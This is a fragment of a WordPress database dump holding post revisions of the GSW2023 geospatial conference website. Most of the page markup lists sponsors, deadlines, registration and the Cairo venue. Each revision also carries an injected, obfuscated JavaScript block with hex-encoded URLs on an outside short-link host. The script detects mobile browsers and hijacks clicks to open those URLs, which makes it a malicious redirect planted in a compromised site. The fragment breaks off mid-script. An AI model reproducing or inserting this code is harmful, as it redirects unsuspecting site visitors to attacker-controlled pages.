_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 04:08:13','2023-05-17 04:08:13','',3066,'https://gsw2023.com/?p=4504',0,'revision','',0),
(4505,1,'2023-05-17 04:08:57','2023-05-17 04:08:57','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\"][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][ultimate_heading main_heading=\"BOOK YOU HOTEL NOW\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgsw2023-venue%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" button_alignment=\"btn_center\" css=\".vc_custom_1684296487606{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 